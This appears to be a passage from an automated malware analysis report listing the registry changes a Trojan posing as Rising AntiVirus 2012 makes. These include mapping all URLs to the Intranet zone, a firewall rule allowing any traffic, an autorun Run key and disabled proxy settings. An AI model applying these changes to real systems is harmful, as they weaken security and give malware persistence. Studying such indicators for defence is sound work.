"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\port_list]
"(Default)" = "110=110|25=120"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\reg_path]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Description" = "Rising System Monitor Driver"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\whitemask]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\lockie]
"url3" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBCUNcUvA="
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\UseAI]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\Rav"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\zone]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\protect_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\oswhite]
"(Default)" = "http://rscloud.rising.net.cn/navigate_oswhite.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\BRScan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\NavigateXml\navig]
"(Default)" = "http://rscloud.rising.net.cn/navigate.xml"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\mode]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\protect_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\BaiduInterval]
"(Default)" = "900"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DLibPath" = "%Program Files%\Rising\RAV\rsdll.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\homepageguard\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\verdict_vir_found]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\InsufficientSpaceHandleMethod]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\notify_timeout]
"(Default)" = "131072"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\level]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\State]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\MaxScanDeep]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"AppProtect" = "11c176b2, 920e004c, 70ffc5d4"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\JoinImprovementPlan]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\state]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\InsufficientSpaceHandleMethod]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rs_processes]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\antipromotionmon\intercept]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\SmartScan]
"ver" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\verdict_vir_found]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\DisableLog]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Features\UrlLogging]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\Default\ProtectConfig\Password]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\JoinImprovementPlan]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\Baidu]
"(Default)" = "14400"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\Default\LargeFileHandleMethod]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\UseCloudDefence]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_filters]
"(Default)" = "2D 00 2D 00 74 00 79 00 70 00 65 00 3D 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\scan_timeout]
"(Default)" = "30000"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\filemon\file_ext_filter]
"(Default)" = "VBS;VBE;JS;JSE;LSP;FAS;ASP;HTT;HTA;CSS;WSH;MHT;JSP;PHP;HTM;HTML;RB;LUA;PY;EXE;COM;SYS;VXD;DRV;DLL;BIN;OVL;386;FON;DOC;DOT;XLS;XLT;PPT;BAT;SCT;OCX;CPL;LNK;EML;NWS;PIF;SHS;MAI;SCR;ZIP;7Z;ARJ;BZ2;BZIP2;CAB;GZ;GZIP;HFS;ISO;LHA;LZH;LZMA;RAR;TAR;"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\PollingPath]
"(Default)" = ";"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudSafe\Default\UseCloudEngine]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AlertSound]
"(Default)" = "1"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\func]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\eshopmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\FileMonRoutine\PackageSizeLimit]
"(Default)" = "0"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1436411441"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"
[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\Default\AutoEnterSilenceMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ScanResultCountPerPage]
"(Default)" = "268435455"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\AutoTreatInfected]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\scriptmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\WhiteList\TrustedFiles]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BackgroundScan\State]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\HTTP\EngDelay]
"(Default)" = "256"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\app_filters]
"ver" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\autorun_disable_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\lockie]
"URL" = "aqceZAduQEZGXRpFB1pTQg4YQUFbQ0dES1wdVQ=="
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\QQMgr]
"(Default)" = "14400"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\UseAI]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\instrmon_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\verdict_vir_found]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\rising\lockie]
"LockTab" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\bamon\state]
"ver" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\mailmon\port_list]
"(Default)" = "110=110|25=120"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\app_filters]
"(Default)" = "00 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\OnlyScanPopMalware]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsLog\KeepDays]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\Default\CurrentWorkMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowAgent]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\bamon\verdict_vir_found]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\AutoTreatInfected]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\lockie]
"TabUrl" = "YA8MJhwfCQ0aRhtOThEPWQ8TCAoHWEZPAhdBWEQWFRgMGEkVDBWy"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\vpatchmon\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BackgroundScan\State]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowScanAd]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\WorkMode\CurrentWorkMode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\REGO]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\kernelreinforce\writelog]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\silent_competitor]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\vpatchmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\PreciseFormat]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\BRScan\pro_path]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\IntegrityDetection\BaiduInterval]
"ver" = "2"
[HKLM\SOFTWARE\rising\lockie]
"Enable" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\BRScan]
"ver" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Control Panel\Desktop]
"FontSmoothingType" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\SmartRelocate]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_filters]
"ver" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\UninstallProtect]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\mailmon\notify_timeout]
"(Default)" = "131072"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\selfdef\notify_user]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\Default\ShowLogonIcon]
"(Default)" = "0"
[HKLM\System\CurrentControlSet\Services\SysMon]
"SrpProtect" = "11c176b2, 920e004c, 70ffc5d4"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 8E CA 3A D7 61 00 10 EA 85 EA E1 57 22 A0 4A"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\officemon\state]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Features\UrlLogging]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\selfdef\protect_registries]
"(Default)" = "00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\homepageguard\state]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"Tag" = "4"
[HKLM\SOFTWARE\MozillaPlugins\@rising.com.cn/nprising\MimeType\application/x-rs-extension]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\TaskRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BackgroundScan\State]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\eshopmon\sites]
"ver" = "16"
[HKLM\System\CurrentControlSet\Services\sysmon\Instances\sysmon]
"Flags" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\webmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\kernelreinforce\whitemask]
"(Default)" = "25"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\FileMonRoutine\AlertSound]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\Features\NoBacore]
"ver" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\DisableLog]
"(Default)" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV]
"InstallLocation" = "%Program Files%\Rising\RAV"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1468033841"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\filemon\verdict_vir_found]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\BankProtRoutine\PackageSizeLimit]
"ver" = "3"
[HKLM\SOFTWARE\rising\RAV\cfg\SoftwareSafe\ProtectConfig\Password]
"(Default)" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\MailMonRoutine\OnlyScanPopMalware]
"ver" = "2"
[HKLM\System\CurrentControlSet\Services\SysMon]
"DependOnService" = ""
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\webmon\app_pathnames]
"(Default)" = "00 00"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\BankProtRoutine\PackageSizeLimit]
"(Default)" = "20"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanReportRoutine\DenferTime]
"(Default)" = "255"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\officemon\exploit_scan_state]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\TaskRoutine\PreciseFormat]
"ver" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RsStore\LargeFileHandleMethod]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanRemovableStorage\MaxScanDeep]
"(Default)" = "2"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\AlertSound]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\MailMonRoutine\UseAI]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\ScanRemovableStorage\FileNameFilter]
"(Default)" = ".exe|.dll"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\KillTroy\DelayCloud]
"(Default)" = "1280"
[HKLM\SOFTWARE\rising\RAV\cfg\RssService\Default\ScanReportRoutine\Report]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\Default\rdskmon\attach_scan_mode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\attach_scan_mode]
"(Default)" = "1"
[HKLM\SOFTWARE\rising\RAV\cfg\RsmonService\rdskmon\state]
"(Default)" = "0"
[HKLM\SOFTWARE\rising\RAV\cfg\CloudQuery\KillTroy\Radio]
"(Default)" = "5"
[HKLM\SOFTWARE\rising\RAV\cfg\Personality\ShowLogonIcon]
"ver" = "2"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Rising\RAV]
"RavMonD.exe" = "%Program Files%\Rising\RAV\ravmond.exe:*:Enabled:RAV Service"
The following driver will be automatically launched by the OS Loader:
[HKLM\System\CurrentControlSet\Services\SysMon]
"Start" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\Services]
"Rising"
The process %original file name%.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 6D 6D EC BF 34 ED 61 78 F2 A6 D8 8C 81 6E 0E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
